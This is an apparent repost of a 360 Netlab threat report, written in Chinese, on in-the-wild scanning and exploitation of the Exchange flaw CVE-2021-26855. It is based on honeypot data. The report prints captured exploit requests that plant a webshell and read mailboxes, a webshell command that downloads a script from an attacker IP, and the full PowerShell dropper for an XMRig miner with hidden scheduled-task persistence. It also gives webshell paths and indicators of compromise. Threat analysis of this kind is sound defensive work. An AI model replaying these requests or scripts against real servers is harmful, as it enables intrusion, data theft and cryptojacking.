Microsoft Exchange 漏洞(CVE-2021-26855)在野扫描分析报告
source link: https://blog.netlab.360.com/microsoft-exchange-vulnerability-cve-2021-26855-scan-analysis/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
2021年3月2号,微软披露了Microsoft Exchange服务器的远程代码执行漏洞[1]。
2021年3月3号开始,360网络安全研究院Anglerfish蜜罐开始模拟和部署Microsoft Exchange蜜罐插件,很快我们搜集到大量的漏洞检测数据,目前我们已经检测到攻击者植入Webshell,获取邮箱信息,甚至进行XMRig恶意挖矿(http://178.62.226.184/run.ps1
)的网络攻击行为。根据挖矿文件路径名特征,我们将该Miner命名为Tripleone。
2021年3月6号开始,ProjectDiscovery和微软CSS-Exchange项目相继披露了漏洞检测脚本[2][3]。
Microsoft Exchange服务器的远程代码执行漏洞利用步骤复杂,一般从PoC公布到黑色产业攻击者利用需要一定的时间,我们看到这个攻击现象已经开始了。
CVE-2021-26855 植入Webshell
POST /ecp/j2r3.js HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json; charset=utf-8
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.&a=~1942062522; ASP.NET_SessionId=00782f75-8b35-11eb-af5a-560002fbb132; msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.
msExchLogonMailbox: S-1-5-20
Content-Length: 381
{"properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\\\127.0.0.1\\c$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test1337.aspx"}}, "identity": {"DisplayName": "OAB (Default Web Site)", "__type": "Identity:ECP", "RawIdentity": "7280d03f-194a-4bf3-98a7-076e7728321d"}}
CVE-2021-26855 获取邮箱信息
POST //ecp/ssrf.js HTTP/1.1
Host: {target}
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Hello-World
Content-Type: text/xml
Cookie: X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;
Content-Length: 756
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<m:GetFolder>
<m:FolderShape>
<t:BaseShape>Default</t:BaseShape>
</m:FolderShape>
<m:FolderIds>
<t:DistinguishedFolderId Id="inbox">
<t:Mailbox>
<t:EmailAddress>[email protected]</t:EmailAddress>
</t:Mailbox>
</t:DistinguishedFolderId>
</m:FolderIds>
</m:GetFolder>
</soap:Body>
</soap:Envelope>
CVE-2021-26855 挖矿攻击
POST /owa/auth/test1337.aspx HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22powershell+IEX+%28New-Object+Net.WebClient%29.DownloadString%28http%3A%2F%2F178.62.226.184%2Frun.ps1%29%22%29.StdOut.ReadAll%28%29%29%3B
攻击者通过http://178.62.226.184/run.ps1
文件植入XMRig挖矿程序,以下是攻击详情:
$ProcessActive = Get-Process javacpl -ErrorAction SilentlyContinue
if($ProcessActive -eq $null)
{
new-item c:\temp\111 -itemtype directory
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://178.62.226.184/config.json","C:\temp\111\config.json")
$WebClient.DownloadFile("http://178.62.226.184/javacpl.exe","C:\temp\111\javacpl.exe")
$WebClient.DownloadFile("http://178.62.226.184/WinRing0x64.sys","C:\temp\111\WinRing0x64.sys")
Start-Process -Filepath "C:\temp\111\javacpl.exe"
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString('http://178.62.226.184/run.ps1')"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "App2" -Description "Check"
}
else
{
Write-host "run"
}
Anglerfish蜜罐数据视野
2021年3月6日开始,360网络安全研究院Anglerfish蜜罐系统监测到Microsoft Exchange漏洞(CVE-2021-26855)扫描,截至日前,扫描源IP地址地理位置分布如下:
通过对扫描端口分析发现,扫描目的端口主要是443端口(77.3%),其次是80端口(11.3%),如下图:
根据分析捕获的扫描流量,扫描源IP ASN(Autonomous System Numbers)主要是Linode, LLC、DiGiTALOCEAN-ASN和LeaseWeb Netherlands B.V.,占比50%以上,扫描整体趋势如下:
扫描源IP来自全球各个国家,其中美国占比最大,如下图:
对捕获的流量进行分析发现,Top 5的扫描IP占比所有扫描行为的50%,其中159.89.95.163占比达24%,暴露了该IP具有一定的组织性。
通过对攻击流量进行分析发现,攻击者已经能够成功利用该漏洞植入Webshell,详情如下图所示:
攻击者通过Webshell进一步实施恶意攻击操作,如植入XMRig挖矿程序,详情如下图所示:
部分扫描源IP rDNS SLD信息
我们通过简单分析Microsoft Exchange漏洞(CVE-2021-26855)扫描的扫描源IP对应的rDNS信息,可以看到一些组织信息。
Webshell 分析
我们监测到大量Webshell路径探测请求,其中大部分是安全厂商和研究机构的扫描行为。
已知Webshell路径如下所示:
GET /aspnet_client/system_web/log.aspx 1682
GET /aspnet_client/OutlookEN.aspx 1660
GET /aspnet_client/HttpProxy.aspx 1643
GET /aspnet_client/aspnet_client.aspx 1613
GET /aspnet_client/discover.aspx 1583
GET /aspnet_client/supp0rt.aspx 1490
GET /owa/auth/OutlookEN.aspx 1464
GET /aspnet_client/aspnet_iisstart.aspx 1463
GET /owa/auth/Current/scripts/premium/fexppw.aspx 1442
GET /aspnet_client/xclkmcfldfi948398430fdjkfdkj.aspx 1441
GET /aspnet_client/Server.aspx 1433
GET /owa/auth/8Lw7tAhF9i1pJnRo.aspx 1428
GET /owa/auth/logg.aspx 1416
GET /aspnet_client/xx.aspx 1412
GET /owa/auth/a.aspx 1403
GET /owa/auth/Current/themes/errorFS.aspx 1393
GET /owa/auth/errorPage.aspx 1373
GET /owa/auth/getpp.aspx 1367
GET /aspnet_client/aspnet_pages.aspx 1364
GET /owa/auth/default.aspx 1334
GET /owa/auth/fatal-erro.aspx 1326
GET /owa/auth/errorPages.aspx 1322
GET /owa/auth/log.aspx 1311
GET /owa/auth/shel90.aspx 1306
GET /owa/auth/Err0r.aspx 1303
GET /owa/auth/logout.aspx 1302
GET /aspnet_client/log3.aspx 1293
GET /owa/auth/15.0.1347/themes/resources/exchange_create_css.aspx 1285
GET /owa/auth/RedirSuiteServerProxy.aspx 1279
GET /aspnet_client/eror.aspx 1266
GET /aspnet_client/0QWYSEXe.aspx 1263
GET /owa/auth/current/one1.aspx 1260
GET /aspnet_client/session.aspx 1242
GET /aspnet_client/iispage.aspx 1213
GET /aspnet_client/system_web/logx2.aspx 1212
GET /owa/auth/Current/themes/resources/owafont_vo.aspx 1207
GET /aspnet_client/log.aspx 1207
GET /aspnet_client/WlUtyY.aspx 1168
GET /aspnet_client/aspnet_www.aspx 1167
GET /owa/auth/15.0.847/themes/resources/hmask.aspx 1164
GET /owa/auth/Current/app222.aspx 1155
GET /owa/auth/15.1.1913/themes/resources/View_Photos.aspx 1147
GET /owa/auth/ErrorAA.aspx 1089
GET /owa/auth/one.aspx 1079
GET /aspnet_client/errorcheck.aspx 1074
GET /owa/auth/one1.aspx 1072
GET /aspnet_client/system_web/logfe.aspx 1064
GET /owa/auth/zntwv.aspx 1031
GET /owa/auth/Current/themes/resources/owafont_vn.aspx 1019
GET /owa/auth/shel.aspx 1016
GET /owa/auth/shel2.aspx 1011
GET /owa/auth/bob.aspx 1008
GET /owa/auth/OutlookZH.aspx 1008
GET /owa/auth/Current/themes/resources/daxlz.aspx 1001
GET /owa/auth/authhead.aspx 1000
GET /owa/auth/15.1.1913/themes/resources/bg_gradient_login.aspx 993
GET /aspnet_client/default1.aspx 984
GET /aspnet_client/system_web/logon.aspx 978
GET /aspnet_client/s.aspx 930
GET /aspnet_client/RedirSuiteServerProxy.aspx 927
GET /aspnet_client/8aUco9ZK.aspx 920
GET /aspnet_client/F48zhi6U.aspx 917
GET /aspnet_client/E3MsTjP8.aspx 915
GET /aspnet_client/Fc1b3WDP.aspx 915
GET /aspnet_client/2XJHwN19.aspx 907
GET /aspnet_client/0q1iS7mn.aspx 905
GET /aspnet_client/shell.aspx 901
GET /aspnet_client/McYhCzdb.aspx 898
GET /aspnet_client/sol.aspx 893
GET /aspnet_client/aspnettest.aspx 889
GET /aspnet_client/error_page.aspx 885
GET /aspnet_client/system_web/error.aspx 883
GET /aspnet_client/UwSPMsFi.aspx 882
GET /aspnet_client/web.config.aspx 878
GET /aspnet_client/shellex.aspx 876
GET /aspnet_client/uHSPTWMG.aspx 873
GET /aspnet_client/help.aspx 868
GET /aspnet_client/load.aspx 865
GET /aspnet_client/zXkZu6bn.aspx 858
GET /aspnet_client/ogu7zFil.aspx 843
GET /owa/auth/shell.aspx 644
GET /owa/auth/web.aspx 643
GET /owa/auth/aspnet_client.aspx 639
GET /owa/auth/errorEEE.aspx 635
GET /owa/auth/27fib.aspx 627
GET /owa/auth/errorEE.aspx 625
GET /owa/auth/b.aspx 624
GET /owa/auth/aspnettest.aspx 621
GET /owa/auth/healthcheck.aspx 621
GET /owa/auth/t.aspx 620
GET /owa/auth/shellex.aspx 619
GET /owa/auth/wanlin.aspx 619
GET /owa/auth/aspnet_iisstart.aspx 619
GET /owa/auth/errorFF.aspx 615
GET /owa/auth/test.aspx 615
GET /owa/auth/document.aspx 614
GET /owa/auth/xx.aspx 613
GET /owa/auth/help.aspx 612
GET /owa/auth/evilcorp.aspx 611
GET /owa/auth/web.config.aspx 606
GET /owa/auth/error_page.aspx 605
GET /owa/auth/aspnet_www.aspx 603
GET /owa/auth/errorFE.aspx 601
GET /owa/auth/errorEW.aspx 597
GET /owa/auth/OutlookDA.aspx 288
GET /owa/auth/OutlookFR.aspx 208
GET /owa/auth/OutlookIT.aspx 187
GET /owa/auth/OutlookDE.aspx 186
GET /owa/auth/OutlookES.aspx 182
GET /owa/auth/expiredpassword.aspx 175
GET /owa/auth/OutlookPL.aspx 171
GET /owa/auth/OutlookAR.aspx 165
GET /owa/auth/OutlookSE.aspx 162
GET /owa/auth/logoff.aspx 150
GET /owa/auth/OutlookAS.aspx 146
GET /owa/auth/OutlookIO.aspx 144
GET /owa/auth/OutlookCN.aspx 111
GET /aspnet_client/Service.aspx 88
GET /aspnet_client/1d.aspx 88
GET /aspnet_client/Metabase.aspx 86
GET /aspnet_client/7KmCS.aspx 86
GET /aspnet_client/config.aspx 79
GET /aspnet_client/cafZCu.aspx 78
GET /aspnet_client/8lw7tahf9i1pjnro.aspx 77
GET /aspnet_client/MAlREnavuY.aspx 77
GET /aspnet_client/a.aspx 77
GET /aspnet_client/Default.aspx 76
GET /aspnet_client/ahihi.aspx 76
GET /aspnet_client/aa.aspx 76
GET /aspnet_client/aspnet_iistart.aspx 75
GET /aspnet_client/configs.aspx 74
GET /aspnet_client/aspnet.aspx 71
GET /aspnet_client/aspx_client.aspx 69
GET /aspnet_client/error404.aspx 67
GET /aspnet_client/bob.aspx 67
GET /aspnet_client/document.aspx 67
GET /aspnet_client/authhead.aspx 67
GET /aspnet_client/current/one1.aspx 63
GET /aspnet_client/client.aspx 63
GET /aspnet_client/erroree.aspx 63
GET /owa/auth/seclogon.aspx 61
GET /aspnet_client/upnews.aspx 60
GET /aspnet_client/errorff.aspx 60
GET /owa/auth/Current/themes/resources/system_io.aspx 60
GET /owa/auth/15.1.225/scripts/premium/errorPE.aspx 59
GET /aspnet_client/y3iGH.aspx 59
GET /owa/auth/Current/themes/resources/errorFE.aspx 59
GET /owa/auth/Current/AMNBJLXqoHTV.aspx 59
GET /aspnet_client/errorew.aspx 59
GET /owa/auth/Current/themes/resources/OutlookQN.aspx 59
GET /owa/auth/Current/themes/resources/View_tools.aspx 59
GET /owa/auth/6GIXZG.aspx 59
GET /aspnet_client/system_web/ogzsis0L.aspx 59
GET /owa/auth/Current/themes/resources/Ignrop.aspx 59
GET /aspnet_client/errorpages.aspx 58
GET /aspnet_client/erroreee.aspx 58
GET /owa/auth/hmknq.aspx 57
GET /aspnet_client/system_web/4_0_30319/self.aspx 57
GET /owa/auth/DesktopShellExt.aspx 57
GET /aspnet_client/web.aspx 56
GET /aspnet_client/system_web/9VkFwtxt.aspx 56
GET /aspnet_client/default.aspx 56
GET /aspnet_client/soHKY.aspx 56
GET /aspnet_client/errorpage.aspx 56
GET /owa/auth/rlvgk.aspx 54
GET /owa/auth/logerr.aspx 54
GET /owa/auth/pzbwl.aspx 54
GET /owa/auth/owaauth.aspx 54
GET /aspnet_client/est11.aspx 54
GET /owa/auth/errorcheck.aspx 53
GET /owa/auth/Current/layout.aspx 52
GET /owa/auth/Current/themes/resources/logon.aspx 52
GET /owa/auth/CommonError.aspx 52
GET /owa/auth/Current/themes/config1.aspx 52
GET /owa/auth/ErrorDef.aspx 52
GET /owa/auth/iasads.aspx 51
GET /owa/auth/15.1.2044/themes/resources/office365_ph.aspx 51
GET /owa/auth/061a06908b.aspx 50
GET /owa/auth/Current/zJBxcBoI.aspx 50
GET /owa/auth/errorew.aspx 50
GET /aspnet_client/help..aspx 50
GET /owa/auth/15.0.1497/themes/resources/error.aspx 50
GET /owa/auth/rwinsta.aspx 50
GET /aspnet_client/t.aspx 50
GET /owa/auth/server.aspx 49
GET /owa/auth/erroreww.aspx 49
GET /aspnet_client/temp.aspx 49
GET /owa/auth/frow.aspx 49
GET /aspnet_client/test007.aspx 49
GET /owa/auth/fhsvc.aspx 49
GET /owa/auth/s.aspx 48
GET /owa/auth/errorpage.aspx 48
GET /aspnet_client/zEeomtdYcX.aspx 48
GET /owa/auth/session.aspx 48
GET /owa/auth/secauth.aspx 48
GET /owa/auth/Current/Exchanges.aspx 48
GET /owa/auth/erroree.aspx 48
GET /owa/auth/atlthunk.aspx 48
GET /aspnet_client/voqbETdoni.aspx 48
GET /owa/auth/secauth1.aspx 48
GET /owa/auth/online.aspx 48
GET /owa/auth/erroreee.aspx 48
GET /owa/auth/outlooken.aspx 48
GET /owa/auth/error.aspx 47
GET /owa/auth/ProximityService.aspx 47
GET /owa/auth/outlookfront.aspx 47
GET /owa/auth/proxylogon.aspx 47
GET /owa/auth/8lw7tahf9i1pjnro.aspx 47
GET /owa/auth/ovfwHWjwWm.aspx 47
GET /owa/auth/qnx.aspx 47
GET /owa/auth/plorion.aspx 47
GET /aspnet_client/uyqITYBPew.aspx 47
GET /owa/auth/outlookru.aspx 47
GET /aspnet_client/show.aspx 47
GET /aspnet_client/fatal-erro.aspx 46
GET /owa/auth/errorfff.aspx 46
GET /owa/auth/KBDBENE.aspx 46
GET /owa/auth/OutlookUS.aspx 46
GET /aspnet_client/system.aspx 46
GET /owa/auth/login.aspx 46
GET /owa/auth/letmeinplzs.aspx 46
GET /owa/auth/jhJ2zT9ouOfP6VnBcHg3.aspx 46
GET /owa/auth/errorff.aspx 46
GET /owa/auth/redirsuiteserverproxy.aspx 45
GET /aspnet_client/signon.aspx 45
GET /aspnet_client/healthcheck.aspx 45
GET /aspnet_client/login.aspx 45
GET /owa/auth/ntprint.aspx 45
GET /owa/auth/m0xbqRg1ranzvGD3jiXT.aspx 44
GET /aspnet_client/qfmrucnzl.aspx 44
GET /owa/auth/errorpages.aspx 44
GET /owa/auth/XblGameSave.aspx 44
GET /owa/auth/OutlookDN.aspx 44
GET /aspnet_client/obq.aspx 44
GET /owa/auth/load.aspx 44
GET /aspnet_client/logaaa.aspx 44
GET /owa/auth/discover.aspx 43
GET /owa/auth/outlookjp.aspx 43
GET /owa/auth/jOBJIfr92ERLmg1HcnF3.aspx 43
GET /owa/auth/hUjwpeROcY7Fo4g8ETH3.aspx 42
GET /aspnet_client/shel90.aspx 42
GET /aspnet_client/support.aspx 42
GET /owa/auth/HcDKNzBoha.aspx 41
GET /owa/auth/multiup.aspx 41
GET /owa/auth/FR5Ha0D1dwfsqIUMhLCQ.aspx 40
GET /owa/auth/outlookzh.aspx 40
GET /owa/auth/HUUPItrNpXvI.aspx 40
GET /owa/auth/dbuj9.aspx 40
GET /owa/auth/xclkmcfldfi948398430fdjkfdkj.aspx 40
GET /owa/auth/L2oXwTljs3GnMyHQV0KR.aspx 39
GET /owa/auth/sol.aspx 39
GET /owa/auth/httpproxy.aspx 39
GET /owa/auth/XboxNetApiSvc.aspx 39
GET /owa/auth/supp0rt.aspx 39
GET /aspnet_client/one.aspx 39
GET /owa/auth/signon.aspx 38
GET /aspnet_client/outlookjp.aspx 38
GET /owa/auth/OutlookEN.US.aspx 38
GET /owa/auth/KrhHyDPwb70ct362JmLn.aspx 38
GET /owa/auth/OutlookUN.aspx 37
GET /owa/auth/aa.aspx 36
GET /owa/auth/aaa.aspx 36
GET /owa/auth/iispage.aspx 36
GET /aspnet_client/redirsuiteserverproxy.aspx 36
GET /owa/auth/shelltest.aspx 35
GET /owa/auth/system_web/log.aspx 35
GET /owa/auth/aspx_client.aspx 35
GET /owa/auth/tst1.aspx 35
GET /owa/auth/tpmvscmgrsvr.aspx 35
GET /aspnet_client/online.aspx 34
GET /owa/auth/VqEUaLjKpcWoNC7yPMlz.aspx 34
GET /owa/auth/aspnet.aspx 34
GET /aspnet_client/outlookru.aspx 34
GET /aspnet_client/outlookzh.aspx 34
GET /aspnet_client/outlookfront.aspx 34
GET /aspnet_client/shel.aspx 33
GET /aspnet_client/logg.aspx 33
GET /owa/auth/asas.aspx 33
GET /aspnet_client/server.aspx 33
GET /owa/auth/tNLPge.aspx 32
GET /owa/auth/ahihi.aspx 32
GET /owa/auth/TimeoutLogout.aspx 32
GET /owa/auth/aspnet_pages.aspx 32
GET /owa/auth/ZI3uMczmPa5bwTYVpKsE.aspx 32
GET /owa/auth/test13037.aspx 31
GET /aspnet_client/shel2.aspx 31
GET /aspnet_client/one1.aspx 31
GET /aspnet_client/httpproxy.aspx 31
GET /owa/auth/test1337.aspx 31
GET /owa/auth/signout.aspx 29
GET /aspnet_client/outlooken.aspx 28
GET /owa/auth/default1.aspx 28
GET /owa/auth/theme-gsx8ujzpicf0.aspx 28
GET /aspnet_client/multiup.aspx 27
GET /aspnet_client/logout.aspx 27
GET /owa/auth/theme-vten8snn874b.aspx 25
GET /aspnet_client/error.aspx 8
GET /aspnet_client/errorFF.aspx 8
GET /aspnet_client/errorEE.aspx 8
GET /owa/auth/OutlookJP.aspx 6
GET /aspnet_client/errorEW.aspx 6
POST /aspnet_client/discover.aspx 5
GET /aspnet_client/errorEEE.aspx 5
POST /aspnet_client/system_web/logx2.aspx 4
GET /owa/auth/HttpProxy.aspx 4
GET /owa/auth/OutlookRU.aspx 4
GET /aspnet_client/system_web/sol.aspx 4
GET /aspnet_client/system_web/QBFjM1SC.aspx 4
GET /aspnet_client/OutlookJP.aspx 4
GET /aspnet_client/system_web/ioWYM7C4.aspx 4
GET /owa/auth/Online.aspx 4
GET /aspnet_client/MultiUp.aspx 4
GET /owa/auth/Logout.aspx 4
GET /aspnet_client/system_web/E12B65rm.aspx 4
GET /aspnet_client/system_web/vY4qLEpG.aspx 3
GET /aspnet_client/system_web/test.aspx 3
GET /aspnet_client/Online.aspx 3
GET /aspnet_client/system_web/3ue5myCq.aspx 3
GET /aspnet_client/system_web/sJ0f8qHt.aspx 3
GET /aspnet_client/system_web/cMvBgHLZ.aspx 3
GET /aspnet_client/system_web/WFk2or3Y.aspx 3
GET /aspnet_client/system_web/GnCwADKH.aspx 3
GET /aspnet_client/rabiitch.aspx 3
GET /aspnet_client/system_web/Cs64LbPk.aspx 3
GET /aspnet_client/Logout.aspx 2
GET /owa/auth/WMSPDMOD.aspx 2
GET /aspnet_client/OutlookRU.aspx 2
GET /owa/auth/Discover.aspx 2
GET /aspnet_client/system_web/2TFGNswO.aspx 2
GET /aspnet_client/Discover.aspx 2
GET /owa/auth/checkerror635284.aspx 2
GET /owa/auth/MultiUp.aspx 2
GET /aspnet_client/system_web/3NHhPxJ5.aspx 2
GET /aspnet_client/system_web/1A2ZeQOu.aspx 2
GET /owa/auth/Current/themes/resources/lgnleft.aspx 2
GET /aspnet_client/checkerror635284.aspx 2
GET /owa/auth/1d61acae91.aspx 2
GET /owa/auth/current/themes/resources/error.aspx 1
GET /aspnet_client/iisstart.aspx 1
GET /owa/auth/lo.aspx 1
GET /owa/auth/error404.aspx 1
Miscrosoft Exchange服务器分布
360 Quake网络空间测绘系统通过对全网资产测绘,发现Microsoft Exchange服务器共3,378,260条数据记录,其中有534,590个独立IP,具体分布如下图所示。
感兴趣的读者,可以在 twitter 或者通过邮件netlab[at]360.cn联系我们。
178.62.226.184
157.245.47.214
Miner Proxy:
159.65.206.137:3333
http://178.62.226.184/mini-reverse.ps1
http://178.62.226.184/run.ps1
http://178.62.226.184/config.json
http://178.62.226.184/javacpl.exe
http://178.62.226.184/WinRing0x64.sys
79e2c9953f452f777d55749f01e5f3b7
2d4d75e46f6de65fba2451da71686322
0fe28f557e9997cd2750ff3fa86a659e
67f2d42e30f6239114feafc9ffd009d8
0c0195c48b6b8582fa6f6373032118da
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK